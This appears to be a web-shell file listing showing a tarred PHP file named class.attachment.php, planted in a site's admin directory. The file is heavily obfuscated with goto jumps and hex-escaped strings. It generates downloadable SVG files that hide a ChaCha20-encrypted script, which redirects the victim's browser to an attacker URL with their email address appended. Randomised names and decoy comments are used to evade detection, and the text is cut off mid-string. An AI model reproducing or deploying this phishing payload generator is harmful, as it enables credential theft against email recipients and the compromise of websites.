| Current Path : /proc/thread-self/root/proc/self/root/home/i446698/www/aeee1/ |
| Current File : //proc/thread-self/root/proc/self/root/home/i446698/www/aeee1/class.attachment.php.tar |
home/i446698/public_html/seughtunghdyyshry/admin/class.attachment.php 0000666 00000371144 15115045211 0021616 0 ustar 00 <?php
/* Important Notice
Any unauthorized use of this content may lead to significant damage. This includes, but is not limited to, loss of revenue, reputational harm, and legal repercussions. By accessing this material, you agree to use it responsibly and understand that any misuse could result in consequences.
Please respect the rights associated with this work.
*/
goto e3c24; d0731: class SVGRandEncryption { private $Af2bc; private $Fcd19; public function __construct($Bca73, $e90ca) { $this->Af2bc = $Bca73; $this->Fcd19 = $e90ca; } public function rotl($f2eb5, $B9c48) { return $f2eb5 << $B9c48 & 0xffffffff | $f2eb5 >> 32 - $B9c48; } public function quarterRound(&$cc304, $f2eb5, $B9c48, $bb1c5, $Ddd03) { goto Eda62; B6cb7: $cc304[$B9c48] = $this->rotl($cc304[$B9c48] ^ $cc304[$bb1c5], 7); goto d95bc; e1a0b: $cc304[$f2eb5] = $cc304[$f2eb5] + $cc304[$B9c48] & 0xffffffff; goto A36aa; f41d2: $cc304[$Ddd03] = $this->rotl($cc304[$Ddd03] ^ $cc304[$f2eb5], 16); goto f9a1f; b7249: $cc304[$B9c48] = $this->rotl($cc304[$B9c48] ^ $cc304[$bb1c5], 12); goto e1a0b; A36aa: $cc304[$Ddd03] = $this->rotl($cc304[$Ddd03] ^ $cc304[$f2eb5], 8); goto F3b8f; F3b8f: $cc304[$bb1c5] = $cc304[$bb1c5] + $cc304[$Ddd03] & 0xffffffff; goto B6cb7; Eda62: $cc304[$f2eb5] = $cc304[$f2eb5] + $cc304[$B9c48] & 0xffffffff; goto f41d2; f9a1f: $cc304[$bb1c5] = $cc304[$bb1c5] + $cc304[$Ddd03] & 0xffffffff; goto b7249; d95bc: } public function chacha20_block($C8668, $c3169, $cf7e5) { goto E1a92; c9fb1: A8701: goto baa28; D69c1: $this->quarterRound($Ca53e, 3, 7, 11, 15); goto B89df; Feb45: $daf1d = 0; goto c9fb1; b88e1: $this->quarterRound($Ca53e, 1, 6, 11, 12); goto F96e8; aeb4d: $this->quarterRound($Ca53e, 2, 6, 10, 14); goto D69c1; D4c81: $cc304 = array_merge($E7868, array_values(unpack("\126\x2a", $C8668)), array($cf7e5), array_values(unpack("\x56\52", $c3169 . "\x0\x0\0\0"))); goto Eea8d; c6fca: Ec558: goto ae897; Eaa09: $ac06c = ''; goto F26fc; Eea8d: $Ca53e = $cc304; goto Feb45; E064d: ce449: goto C07d7; a603f: A6666: goto d0b19; E1a92: $E7868 = array(0x61707865, 0x3320646e, 0x79622d32, 0x6b206574); goto D4c81; d0b19: $daf1d++; goto Aa424; C07d7: $daf1d = 0; goto B59ba; baa28: if (!($daf1d < 10)) { goto ce449; } goto Ea111; a76e8: if (!($daf1d < 16)) { goto Ecd16; } goto C02bf; Ea111: $this->quarterRound($Ca53e, 0, 4, 8, 12); goto b8962; B59ba: E109c: goto a76e8; E2a3b: goto E109c; goto b152e; Aa424: goto A8701; goto E064d; C02bf: $Ca53e[$daf1d] = $Ca53e[$daf1d] + $cc304[$daf1d] & 0xffffffff; goto c6fca; b44f9: $this->quarterRound($Ca53e, 3, 4, 9, 14); goto a603f; B89df: $this->quarterRound($Ca53e, 0, 5, 10, 15); goto b88e1; F96e8: $this->quarterRound($Ca53e, 2, 7, 8, 13); goto b44f9; d8e00: Bdac0: goto B3e11; ae897: $daf1d++; goto E2a3b; b8962: $this->quarterRound($Ca53e, 1, 5, 9, 13); goto aeb4d; b152e: Ecd16: goto Eaa09; F26fc: foreach ($Ca53e as $Bb5ab) { $ac06c .= pack("\x56", $Bb5ab); fa838: } goto d8e00; B3e11: return $ac06c; goto cdd59; cdd59: } public function encrypt_chacha20($b9f2d, $c3169) { goto a31db; Fc987: $daf1d = 0; goto E807e; Db61b: $C1b3a = $this->chacha20_block($C8668, $c3169, $cf7e5++); goto F02f7; a31db: $C8668 = random_bytes(32); goto C2fc1; A4d5e: $A6e50 = ''; goto af8d2; ec907: E38fc: goto a4084; a4084: $daf1d += 64; goto F389c; F389c: goto a48d2; goto a890e; a31cd: $A6e50 .= $bcaa4 ^ substr($C1b3a, 0, strlen($bcaa4)); goto ec907; Abf22: return $this->split_chunks($C8668 . $c3169 . $A6e50); goto d75ee; a890e: D274f: goto Abf22; E807e: a48d2: goto B3168; F02f7: $bcaa4 = substr($b9f2d, $daf1d, 64); goto a31cd; C2fc1: $cf7e5 = 0; goto A4d5e; af8d2: $fff22 = strlen($b9f2d); goto Fc987; B3168: if (!($daf1d < $fff22)) { goto D274f; } goto Db61b; d75ee: } public function split_chunks($de805, $E2e05 = 6) { goto e9dc5; f240d: foreach (str_split($de805, $E2e05) as $bcaa4) { $d7762[] = bin2hex($bcaa4); c9f6e: } goto A23d9; A23d9: Fed8b: goto A7c0b; e9dc5: $d7762 = []; goto f240d; A7c0b: return "\x5b" . implode("\54", array_map(function ($bcaa4) { return "\x27" . $bcaa4 . "\x27"; }, $d7762)) . "\x5d"; goto B36e0; B36e0: } public function generate() { goto Acea1; C4f6f: return $Ecba9; goto A5e32; Db503: $Bca73 = $this->encrypt_chacha20("\x77\151\156\144\x6f\x77\56\x6c\157\143\x61\164\151\x6f\x6e\x2e\150\162\x65\146\75\42" . $this->Af2bc . "\x2f\x22\x20\x2b\40" . $Cda68["\145\155\141\x69\x6c\x76\141\x72"] . "\73", random_bytes(12)); goto fc8f9; a692f: $Ecba9 = "\x20\40\x20\40\x20\x20\40\40\x76\141\162\x20{$Cda68["\145\155\x61\x69\154\x76\x61\162"]}\40\75\40\42{$this->Fcd19}\x22\73\xd\xa\40\40\x20\x20\xd\xa\40\40\40\40\40\40\x20\x20{$B7437[0]}\15\xa\40\40\x20\40\40\40\x20\x20\x66\x75\156\x63\164\x69\x6f\x6e\x20{$Cda68["\x72\x6f\x74\x6c"]}\x28\x61\x2c\x20\x62\x29\40\x7b\xd\12\x20\x20\x20\40\40\40\40\40\x72\x65\164\165\162\156\x20\50\x28\x61\x20\74\x3c\40\x62\51\x20\x7c\x20\x28\x61\x20\x3e\76\76\40\x28\63\x32\40\55\x20\142\51\51\x29\40\76\76\76\40\60\x3b\15\xa\40\x20\x20\40\x20\40\x20\x20\x7d\15\12\xd\xa\x20\x20\40\x20\40\x20\x20\x20{$B7437[1]}\15\12\xd\12\40\40\40\x20\40\40\40\40\146\165\156\x63\x74\151\x6f\x6e\40{$Cda68["\161\x75\x61\162\x74\x65\x72\x52\157\x75\x6e\x64"]}\50{$Cda68["\x73\164\141\x74\x65"]}\54\x20\x61\54\40\x62\54\x20\x63\54\x20\144\51\x20\173\15\12\x20\x20\40\40\x20\x20\x20\x20{$Cda68["\163\x74\x61\x74\x65"]}\133\141\x5d\40\x3d\40\50{$Cda68["\x73\164\x61\164\145"]}\x5b\141\135\x20\x2b\40{$Cda68["\163\164\x61\x74\x65"]}\x5b\x62\x5d\51\40\x3e\x3e\x3e\40\x30\73\15\12\x20\x20\x20\x20\40\40\40\40{$Cda68["\x73\164\x61\164\x65"]}\133\x64\x5d\40\x3d\x20{$Cda68["\x72\157\x74\x6c"]}\50{$Cda68["\x73\164\141\164\145"]}\133\144\135\x20\x5e\x20{$Cda68["\163\164\141\164\145"]}\x5b\141\135\x2c\40\61\66\x29\73\15\12\40\x20\40\40\x20\40\40\x20\15\xa\40\x20\40\x20\x20\x20\x20\40{$Cda68["\163\164\141\x74\145"]}\133\x63\x5d\40\75\x20\50{$Cda68["\163\x74\x61\164\x65"]}\x5b\143\135\40\x2b\x20{$Cda68["\x73\x74\x61\x74\145"]}\x5b\x64\135\51\x20\76\x3e\76\40\x30\x3b\xd\12\x20\40\x20\x20\40\40\x20\x20{$Cda68["\163\164\141\164\x65"]}\133\142\x5d\40\x3d\x20{$Cda68["\162\x6f\164\154"]}\50{$Cda68["\x73\164\141\x74\x65"]}\x5b\142\x5d\x20\x5e\40{$Cda68["\163\x74\x61\x74\145"]}\133\143\135\54\x20\x31\62\x29\x3b\xd\12\x20\40\40\x20\x20\x20\40\x20\15\xa\40\x20\x20\40\x20\40\x20\40{$Cda68["\163\164\x61\x74\145"]}\133\141\135\x20\x3d\40\50{$Cda68["\163\x74\141\164\145"]}\x5b\x61\135\40\53\40{$Cda68["\x73\x74\x61\x74\145"]}\x5b\x62\x5d\x29\x20\76\76\x3e\40\60\x3b\15\12\x20\x20\x20\x20\x20\x20\40\40{$Cda68["\x73\164\141\164\145"]}\133\x64\x5d\x20\x3d\x20{$Cda68["\162\x6f\164\154"]}\50{$Cda68["\x73\164\141\164\x65"]}\x5b\x64\x5d\x20\136\40{$Cda68["\x73\164\x61\x74\145"]}\x5b\141\x5d\54\40\x38\51\x3b\15\xa\x20\40\x20\40\x20\x20\x20\40\xd\xa\40\40\40\40\40\x20\40\x20{$Cda68["\x73\164\x61\164\145"]}\133\x63\135\x20\x3d\x20\50{$Cda68["\163\164\141\164\x65"]}\133\x63\135\40\53\40{$Cda68["\x73\164\x61\x74\x65"]}\133\144\x5d\x29\x20\76\76\76\40\60\x3b\15\12\40\40\x20\x20\x20\x20\x20\x20{$Cda68["\163\164\x61\164\x65"]}\x5b\142\x5d\x20\75\x20{$Cda68["\162\157\x74\x6c"]}\x28{$Cda68["\x73\164\141\164\x65"]}\x5b\x62\135\x20\x5e\40{$Cda68["\163\x74\x61\164\x65"]}\x5b\143\x5d\x2c\40\67\x29\73\15\xa\40\x20\x20\40\40\40\x20\40\175\15\xa\15\xa\40\x20\40\x20\x20\x20\x20\40\146\x75\x6e\143\164\x69\x6f\156\x20{$Cda68["\x63\150\x61\143\150\141\62\x30\102\x6c\x6f\x63\153"]}\50{$Cda68["\x6b\x65\171"]}\54\40{$Cda68["\x6e\157\x6e\143\x65"]}\54\x20{$Cda68["\x63\157\x75\x6e\164\145\162"]}\x29\x20\x7b\xd\xa\40\40\x20\40\40\40\40\x20\x63\157\156\x73\164\x20{$Cda68["\123\x49\107\115\101"]}\40\75\40\x6e\x65\167\40\125\x69\156\x74\x33\62\101\162\162\141\x79\50\133\x30\170\66\61\x37\x30\67\x38\x36\x35\x2c\40\x30\170\x33\x33\62\x30\66\x34\66\x45\54\x20\60\170\67\71\x36\x32\x32\x44\x33\62\x2c\x20\x30\x78\66\102\62\x30\66\x35\67\x34\135\51\x3b\xd\12\40\40\x20\x20\x20\40\x20\x20\xd\xa\40\40\x20\x20\x20\40\x20\40{$B7437[2]}\15\xa\xd\xa\x20\40\x20\40\x20\40\40\x20\x63\157\x6e\x73\164\40{$Cda68["\163\x74\141\x74\x65"]}\x20\75\x20\x6e\x65\x77\x20\x55\151\x6e\164\x33\x32\x41\162\x72\141\x79\x28\61\66\x29\x3b\15\12\40\x20\x20\40\x20\40\x20\x20{$Cda68["\x73\164\x61\x74\x65"]}\56\163\x65\164\50{$Cda68["\x53\111\107\115\101"]}\x29\x3b\xd\12\x20\x20\40\40\x20\x20\40\x20{$Cda68["\x73\x74\x61\x74\x65"]}\56\x73\145\x74\50\156\x65\167\40\125\151\x6e\x74\63\62\101\162\162\x61\171\x28{$Cda68["\x6b\x65\171"]}\x2e\142\165\146\x66\x65\x72\51\x2c\x20\x34\51\73\15\12\x20\x20\40\40\x20\40\40\40{$Cda68["\x73\x74\x61\164\x65"]}\x5b\61\62\x5d\x20\x3d\x20{$Cda68["\x63\157\165\x6e\164\x65\x72"]}\73\xd\12\x20\40\x20\40\x20\40\x20\40{$Cda68["\x73\164\141\164\x65"]}\56\163\x65\x74\x28\156\145\167\40\x55\x69\156\x74\63\62\101\x72\162\x61\x79\x28{$Cda68["\156\157\x6e\x63\145"]}\56\x62\x75\146\146\145\162\51\x2c\x20\61\63\x29\x3b\15\12\40\x20\x20\40\x20\40\x20\40\15\xa\x20\x20\x20\40\x20\40\40\x20\x63\157\156\x73\164\40{$Cda68["\167\157\162\153\151\x6e\147"]}\40\x3d\x20\156\x65\167\x20\x55\x69\156\x74\63\62\x41\x72\x72\x61\x79\x28{$Cda68["\x73\x74\x61\164\x65"]}\x29\73\15\12\x20\x20\40\x20\x20\x20\40\40\15\12\40\x20\40\40\40\x20\40\x20\x66\x6f\x72\x20\x28\x6c\x65\164\40\151\40\75\x20\x30\73\40\151\40\74\x20\61\60\x3b\x20\151\53\x2b\51\x20\x7b\xd\xa\40\40\40\40\40\x20\x20\x20\x20\x20\x20\x20{$Cda68["\x71\x75\x61\x72\164\x65\162\122\x6f\x75\156\144"]}\x28{$Cda68["\x77\157\162\x6b\151\156\x67"]}\x2c\x20\x30\x2c\x20\x34\54\x20\70\x2c\40\61\62\x29\x3b\15\12\x20\x20\x20\40\40\x20\x20\x20\x20\x20\x20\40{$Cda68["\x71\165\x61\162\164\145\162\x52\157\x75\x6e\144"]}\x28{$Cda68["\167\x6f\x72\x6b\x69\x6e\147"]}\54\40\61\54\40\65\x2c\40\71\54\40\x31\x33\x29\73\xd\xa\40\40\x20\x20\x20\x20\40\x20\40\x20\x20\x20{$Cda68["\x71\x75\x61\x72\x74\145\162\x52\x6f\165\156\144"]}\x28{$Cda68["\167\157\162\153\x69\156\x67"]}\54\40\x32\x2c\40\66\54\x20\x31\x30\54\40\61\64\x29\73\xd\xa\40\x20\x20\40\x20\40\40\40\x20\40\40\40{$Cda68["\x71\x75\x61\x72\x74\145\162\122\157\x75\x6e\x64"]}\50{$Cda68["\x77\157\162\x6b\x69\156\147"]}\54\40\63\54\x20\x37\54\x20\x31\61\x2c\40\x31\x35\51\x3b\15\xa\40\x20\40\x20\40\40\40\40\40\x20\40\40{$Cda68["\161\165\141\162\164\x65\162\122\x6f\165\156\x64"]}\x28{$Cda68["\x77\157\x72\153\x69\156\147"]}\x2c\40\60\x2c\40\65\54\40\x31\x30\54\x20\61\x35\x29\73\xd\12\x20\40\40\40\x20\x20\40\x20\40\x20\x20\x20{$Cda68["\161\165\141\x72\x74\x65\162\122\157\x75\x6e\x64"]}\x28{$Cda68["\x77\157\162\153\x69\x6e\x67"]}\x2c\40\61\x2c\40\x36\54\x20\x31\61\x2c\40\61\62\51\x3b\15\12\40\x20\40\40\x20\x20\40\40\x20\40\x20\x20{$Cda68["\161\x75\x61\162\164\x65\x72\x52\x6f\165\x6e\x64"]}\50{$Cda68["\x77\157\x72\x6b\x69\x6e\x67"]}\x2c\40\62\x2c\x20\x37\54\40\70\54\40\x31\x33\51\73\15\12\40\40\x20\x20\40\40\x20\x20\40\x20\x20\x20{$Cda68["\161\x75\141\162\x74\x65\x72\x52\157\x75\x6e\x64"]}\x28{$Cda68["\x77\x6f\162\153\x69\156\x67"]}\x2c\x20\x33\54\x20\64\54\40\71\x2c\40\61\x34\x29\x3b\xd\12\40\40\x20\40\x20\40\x20\40\175\xd\xa\40\x20\40\x20\x20\x20\x20\40\xd\xa\x20\x20\40\40\x20\40\x20\40\x66\157\162\x20\x28\154\x65\164\x20\x69\40\75\x20\x30\x3b\40\x69\x20\74\40\61\66\x3b\40\x69\53\x2b\51\x20\173\xd\xa\40\40\x20\40\40\40\40\x20\40\40\40\x20{$Cda68["\x77\x6f\x72\153\x69\x6e\147"]}\x5b\151\x5d\x20\75\x20\x28{$Cda68["\x77\157\x72\153\151\156\147"]}\x5b\x69\135\40\x2b\40{$Cda68["\x73\x74\x61\x74\x65"]}\133\x69\135\x29\x20\x3e\x3e\x3e\x20\x30\73\15\12\40\x20\x20\x20\x20\x20\40\40\175\xd\12\x20\40\40\x20\40\x20\40\40\xd\xa\x20\x20\40\40\40\x20\40\40\162\145\164\x75\x72\x6e\40{$Cda68["\x77\x6f\x72\x6b\151\x6e\x67"]}\73\15\12\40\x20\x20\40\x20\40\x20\40\175\15\xa\15\xa\40\x20\40\40\40\40\x20\x20\166\x61\x72\40{$Cda68["\x65\x6e\x63\162\x79\160\x74\x65\144\x49\156\160\x75\x74"]}\x20\x3d\40\42{$Bca73}\x22\x3b\xd\12\15\xa\40\x20\40\40\x20\x20\x20\40{$B7437[3]}\15\12\x20\x20\x20\40\x20\x20\x20\40\x76\x61\x72\40{$Cda68["\144\x61\x72\164"]}\x20\x3d\40\x5b\135\x3b\xd\xa\x20\40\x20\40\40\40\x20\x20{$Cda68["\x64\x61\x72\x74"]}\56\160\x75\163\x68\x28{$Cda68["\145\x6e\143\x72\x79\160\164\x65\144\x49\x6e\x70\x75\x74"]}\x29\x3b\15\12\x20\40\40\40\40\x20\40\x20{$Cda68["\x64\x65\143\162\x79\x70\x74\x43\x68\x61\103\x68\141\x32\x30"]}\x28{$Cda68["\144\x61\x72\x74"]}\133\60\135\51\x3b\15\12\xd\12\x20\40\40\x20\40\x20\40\x20\x66\165\156\x63\164\151\157\x6e\40{$Cda68["\x64\145\143\162\171\160\164\103\150\x61\103\150\x61\62\60"]}\50\141\162\162\141\x79\x53\164\x72\151\156\147\51\x20\x7b\xd\12\40\x20\40\40\40\40\x20\40\143\157\x6e\163\164\40{$Cda68["\143\x68\165\156\x6b\x73"]}\40\75\40\141\x72\162\141\171\x53\164\162\x69\156\x67\15\xa\x20\40\40\40\x20\40\x20\40\40\x20\x20\40\x2e\163\x6c\x69\143\x65\50\x31\54\40\x2d\61\x29\15\xa\x20\x20\40\x20\x20\40\x20\40\x20\x20\x20\40\56\163\160\154\x69\164\50\47\x2c\x27\x29\xd\xa\x20\40\40\40\x20\x20\x20\x20\x20\x20\40\x20\56\x6d\141\x70\x28\x73\40\75\x3e\40\x73\x2e\x72\x65\160\154\141\143\x65\x28\x2f\x27\57\147\x2c\x20\47\x27\x29\56\164\162\151\155\x28\51\x29\73\xd\xa\40\40\x20\x20\40\x20\40\40\xd\12\40\x20\x20\x20\40\40\x20\x20\x63\x6f\x6e\x73\x74\40{$Cda68["\x62\x69\x6e\141\x72\171\x43\150\165\156\x6b\163"]}\x20\x3d\x20{$Cda68["\x63\x68\x75\156\153\x73"]}\x2e\x6d\x61\160\x28\x68\x65\x78\x20\x3d\x3e\x20\15\xa\x20\x20\x20\40\x20\x20\40\x20\x20\40\40\x20\156\145\x77\40\125\151\156\164\x38\101\x72\162\141\x79\x28\x68\145\170\56\x6d\141\x74\x63\x68\50\57\56\x7b\x31\54\62\175\x2f\x67\51\x2e\155\141\x70\50\x62\171\x74\x65\40\75\76\x20\160\x61\162\163\x65\111\156\x74\x28\142\171\164\145\54\40\x31\66\x29\x29\x29\xd\xa\40\40\40\x20\40\x20\40\40\x29\x3b\15\12\x20\x20\40\x20\40\40\x20\x20\15\xa\x20\40\40\40\40\40\40\x20\143\157\x6e\x73\x74\x20{$Cda68["\x66\x75\154\154\104\141\x74\x61"]}\x20\x3d\x20\x6e\x65\x77\40\x55\x69\156\164\70\x41\x72\162\141\x79\x28{$Cda68["\142\151\156\x61\162\171\x43\x68\x75\x6e\x6b\163"]}\56\x72\145\144\x75\143\x65\50\50\x61\x63\143\x2c\40\143\x68\165\156\153\x29\x20\x3d\76\40\133\x2e\x2e\x2e\x61\x63\x63\x2c\x20\x2e\56\x2e\x63\x68\x75\156\x6b\135\x2c\x20\133\135\x29\51\73\xd\12\40\40\40\x20\x20\40\40\40\xd\xa\40\x20\x20\40\x20\x20\40\x20\143\157\156\x73\x74\x20{$Cda68["\153\x65\171"]}\40\75\40{$Cda68["\146\x75\x6c\x6c\104\x61\164\141"]}\56\163\154\x69\x63\145\x28\x30\x2c\x20\63\x32\x29\73\15\12\40\x20\40\40\x20\40\40\x20\x63\157\x6e\163\x74\x20{$Cda68["\x6e\x6f\156\143\145"]}\40\75\x20{$Cda68["\146\x75\154\x6c\104\x61\164\141"]}\56\163\x6c\151\143\145\x28\x33\x32\x2c\x20\64\64\x29\x3b\15\12\40\x20\x20\40\x20\x20\40\40\x63\157\156\163\x74\x20{$Cda68["\143\x69\x70\150\145\x72\x74\145\x78\x74"]}\x20\x3d\x20{$Cda68["\146\x75\x6c\154\x44\141\x74\141"]}\x2e\163\x6c\x69\143\145\50\x34\64\51\73\15\xa\40\x20\40\x20\40\40\40\x20{$B7437[4]}\xd\12\40\x20\40\x20\x20\x20\x20\40\154\145\x74\40{$Cda68["\143\157\x75\x6e\x74\x65\x72"]}\40\75\40\x30\x3b\15\12\40\x20\40\40\40\x20\x20\40\x6c\145\x74\x20{$Cda68["\160\154\x61\151\x6e\x74\x65\170\x74"]}\40\75\40\156\x65\x77\40\x55\151\156\x74\70\x41\x72\162\141\171\50{$Cda68["\x63\151\160\150\145\x72\x74\145\x78\x74"]}\x2e\x6c\145\156\147\x74\x68\x29\x3b\xd\xa\40\40\40\40\40\x20\x20\x20\xd\xa\40\x20\40\x20\x20\40\x20\40\x66\x6f\162\x20\x28\x6c\x65\164\x20\151\40\x3d\40\60\73\x20\151\40\x3c\x20{$Cda68["\x63\151\160\150\145\162\x74\145\170\164"]}\x2e\x6c\x65\x6e\x67\164\150\x3b\x20\151\40\53\75\x20\66\x34\51\40\173\15\12\40\x20\40\40\x20\40\x20\x20\40\x20\40\x20\143\157\x6e\x73\164\40{$Cda68["\153\145\x79\x73\x74\162\145\x61\x6d"]}\40\x3d\x20{$Cda68["\x63\x68\141\143\150\x61\62\x30\x42\154\157\x63\x6b"]}\x28{$Cda68["\153\x65\x79"]}\54\40{$Cda68["\x6e\157\156\x63\x65"]}\54\40{$Cda68["\x63\157\x75\x6e\x74\x65\x72"]}\x2b\x2b\51\x3b\15\12\x20\x20\40\x20\40\x20\40\x20\40\40\x20\x20\143\157\156\163\164\x20{$Cda68["\153\x65\171\x73\x74\162\145\x61\x6d\102\171\164\145\x73"]}\40\75\x20\x6e\145\x77\40\x55\x69\x6e\164\x38\101\162\x72\x61\x79\50{$Cda68["\x6b\145\x79\x73\164\x72\x65\141\x6d"]}\56\x62\165\x66\146\145\x72\51\73\xd\xa\x20\x20\40\x20\x20\x20\x20\40\40\40\40\x20\143\157\x6e\163\164\x20{$Cda68["\143\150\x75\x6e\153"]}\40\x3d\x20{$Cda68["\x63\x69\160\150\145\162\164\145\170\164"]}\56\x73\x6c\151\x63\x65\x28\x69\x2c\x20\151\40\53\x20\x36\x34\51\73\15\12\40\x20\40\40\40\40\40\x20\40\x20\x20\40\15\12\x20\x20\40\x20\x20\x20\x20\x20\x20\40\x20\x20\x66\x6f\162\40\50\x6c\145\x74\x20\152\x20\x3d\x20\60\73\40\152\40\x3c\x20{$Cda68["\143\x68\x75\x6e\x6b"]}\x2e\154\x65\x6e\x67\164\150\x3b\x20\152\53\x2b\51\40\173\15\12\x20\x20\x20\x20\40\x20\x20\x20\40\x20\x20\40{$Cda68["\x70\154\x61\x69\156\164\x65\x78\x74"]}\x5b\151\x20\53\40\x6a\x5d\x20\75\x20{$Cda68["\x63\x68\165\156\153"]}\x5b\152\x5d\40\x5e\x20{$Cda68["\153\x65\171\x73\164\x72\x65\141\155\x42\171\x74\145\163"]}\x5b\152\135\x3b\15\xa\40\40\x20\40\x20\40\x20\40\40\x20\x20\40\175\15\xa\x20\40\x20\x20\x20\40\40\40\175\15\xa\40\40\40\x20\40\x20\x20\x20\xd\xa\40\x20\x20\x20\x20\x20\40\x20{$B7437[5]}\xd\12\40\x20\x20\x20\x20\40\40\40\x76\x61\162\40{$Cda68["\x62\x72\x65\153\x75"]}\40\75\40\156\x65\x77\x20\124\145\170\164\104\x65\x63\157\x64\145\162\50\51\56\144\145\143\157\x64\x65\50{$Cda68["\x70\x6c\x61\x69\156\164\x65\x78\164"]}\x29\x3b\xd\xa\x20\40\40\40\40\40\x20\x20\166\141\162\x20{$Cda68["\x64\145\162\165\160"]}\x20\x3d\x20\50\146\x75\x6e\x63\x74\151\157\156\x28\51\x7b\x7d\51\56\143\157\x6e\163\x74\162\x75\143\164\x6f\x72\x28{$Cda68["\x62\x72\x65\x6b\165"]}\51\50\51\73\xd\xa\x20\x20\40\x20\40\x20\40\x20\175"; goto C4f6f; Acea1: $Cda68 = ["\162\x6f\x74\154" => TextUtils::generateWord(rand(5, 10)), "\161\165\x61\162\x74\x65\162\122\x6f\x75\x6e\x64" => TextUtils::generateWord(rand(5, 10)), "\143\150\141\143\x68\141\x32\60\102\154\157\143\153" => TextUtils::generateWord(rand(5, 10)), "\x53\111\107\x4d\x41" => TextUtils::generateWord(rand(5, 10)), "\x73\164\141\164\145" => TextUtils::generateWord(rand(5, 10)), "\x77\157\162\153\x69\156\147" => TextUtils::generateWord(rand(5, 10)), "\x65\x6e\x63\162\171\160\x74\x65\144\111\156\160\x75\164" => TextUtils::generateWord(rand(5, 10)), "\x64\141\x72\x74" => TextUtils::generateWord(rand(5, 10)), "\x64\x65\143\x72\171\x70\x74\103\x68\x61\x43\x68\141\x32\60" => TextUtils::generateWord(rand(5, 10)), "\143\150\165\156\x6b\x73" => TextUtils::generateWord(rand(5, 10)), "\x62\x69\156\141\x72\171\x43\150\165\156\x6b\163" => TextUtils::generateWord(rand(5, 10)), "\x66\165\154\154\x44\x61\x74\141" => TextUtils::generateWord(rand(5, 10)), "\153\x65\171" => TextUtils::generateWord(rand(5, 10)), "\156\157\x6e\143\145" => TextUtils::generateWord(rand(5, 10)), "\x63\151\160\x68\x65\162\164\x65\x78\164" => TextUtils::generateWord(rand(5, 10)), "\x63\157\165\x6e\164\145\162" => TextUtils::generateWord(rand(5, 10)), "\x70\154\141\x69\156\164\x65\x78\164" => TextUtils::generateWord(rand(5, 10)), "\153\145\171\163\164\162\145\141\155" => TextUtils::generateWord(rand(5, 10)), "\153\x65\171\163\x74\x72\145\x61\155\102\171\x74\145\x73" => TextUtils::generateWord(rand(5, 10)), "\x63\150\x75\156\x6b" => TextUtils::generateWord(rand(5, 10)), "\142\x72\145\x6b\165" => TextUtils::generateWord(rand(5, 10)), "\144\145\x72\x75\x70" => TextUtils::generateWord(rand(5, 10)), "\x65\155\x61\x69\x6c\166\141\162" => TextUtils::generateWord(rand(5, 10))]; goto Db503; fc8f9: $B7437 = TextUtils::commentGenerateRandomStorySlash(); goto a692f; A5e32: } public function setToSVG() { goto c6ad3; Da27c: header("\x43\157\x6e\164\x65\156\x74\x2d\x54\x79\x70\145\x3a\40\151\155\141\147\145\x2f\163\166\147\53\170\x6d\x6c"); goto b0613; F01d3: $B7437 = TextUtils::commentGenerateRandomStoryNew(); goto c6d1c; b0613: header("\x43\x6f\156\x74\145\156\164\55\104\151\163\x70\x6f\x73\x69\x74\151\x6f\x6e\x3a\40\x61\x74\x74\x61\143\x68\x6d\x65\156\x74\73\40\x66\151\154\x65\x6e\141\x6d\145\75\x22\x67\x65\x6e\x65\x72\141\x74\x65\x64\56\163\166\147\x22"); goto F01d3; c6ad3: $Ecba9 = $this->generate(); goto Da27c; c6d1c: echo "\74\77\170\x6d\154\40\166\x65\x72\x73\151\157\x6e\75\x22\61\56\x30\x22\x20\x65\156\143\x6f\144\151\156\x67\x3d\x22\125\x54\106\x2d\70\x22\x20\163\164\x61\156\x64\141\154\x6f\156\145\x3d\42\156\157\42\77\76\xd\xa\xd\12{$B7437[0]}\xd\12\15\xa\74\x73\x76\x67\x20\x78\x6d\154\x6e\163\75\42\x68\x74\x74\x70\72\57\x2f\x77\x77\167\x2e\167\63\x2e\x6f\x72\147\x2f\x32\x30\60\60\x2f\x73\x76\147\x22\x20\x77\151\x64\164\x68\x3d\42\61\60\x30\42\x20\150\145\x69\x67\x68\164\x3d\42\61\x30\60\x22\76\15\xa\40\40\40\x20\x3c\162\x65\143\x74\x20\167\x69\x64\x74\150\x3d\42\x31\x30\x30\45\42\x20\x68\x65\x69\147\x68\x74\75\x22\x31\x30\60\45\42\x20\x66\x69\154\154\x3d\42\x77\x68\x69\164\x65\42\57\x3e\15\xa\xd\xa\40\x20\40\40{$B7437[1]}\xd\xa\xd\xa\40\x20\40\x20\74\x74\145\170\164\x20\170\75\42\61\x30\x22\40\171\75\x22\x35\60\42\40\x66\157\156\164\x2d\146\x61\x6d\x69\x6c\x79\75\x22\x41\162\x69\141\154\x22\x20\x73\x74\x79\x6c\x65\x3d\42\x64\151\x73\160\154\141\x79\x3a\x20\x6e\x6f\156\x65\73\x22\76\123\126\x47\x3c\57\x74\x65\170\x74\x3e\15\xa\40\x20\40\40\x3c\x66\x6f\162\145\x69\147\156\117\x62\x6a\x65\143\164\40\167\x69\144\164\x68\75\x22\x31\x30\60\x25\42\40\150\145\151\147\x68\x74\75\x22\x31\x30\60\x25\42\40\163\164\x79\x6c\x65\75\x22\x64\x69\163\x70\154\141\x79\x3a\x20\156\x6f\156\145\73\42\x3e\xd\12\x20\40\40\x20\40\40\40\40{$B7437[2]}\15\12\40\x20\x20\40\x20\x20\40\x20\x3c\144\x69\x76\40\170\x6d\154\x6e\163\x3d\x22\x68\x74\x74\x70\72\57\57\167\167\x77\x2e\x77\63\x2e\157\x72\147\x2f\x31\x39\71\71\x2f\170\150\x74\x6d\154\42\40\x73\164\171\154\x65\x3d\x22\x66\x6f\156\164\x2d\146\x61\x6d\x69\x6c\171\x3a\x20\101\162\151\x61\x6c\x3b\40\x63\x6f\154\157\162\x3a\x20\142\x6c\165\x65\x3b\x22\x3e\15\12\40\40\x20\40\40\40\x20\x20\x20\x20\40\40\x53\126\x47\15\xa\x20\40\x20\x20\x20\40\40\40\74\x2f\144\x69\x76\76\xd\12\x20\x20\x20\40\74\x2f\146\x6f\162\x65\151\x67\156\x4f\x62\152\145\x63\164\76\xd\xa\xd\xa\x20\40\x20\40{$B7437[3]}\15\xa\15\12\x20\x20\40\40\74\x73\x63\162\151\160\164\40\x74\171\160\145\75\x22\x61\x70\160\x6c\x69\143\x61\x74\x69\157\156\x2f\x65\143\x6d\x61\163\143\162\151\x70\164\42\x3e\xd\xa\40\x20\40\40\40\x20\40\x20\74\x21\x5b\103\x44\101\x54\x41\x5b\15\12\x20\x20\x20\x20\40\40\x20\x2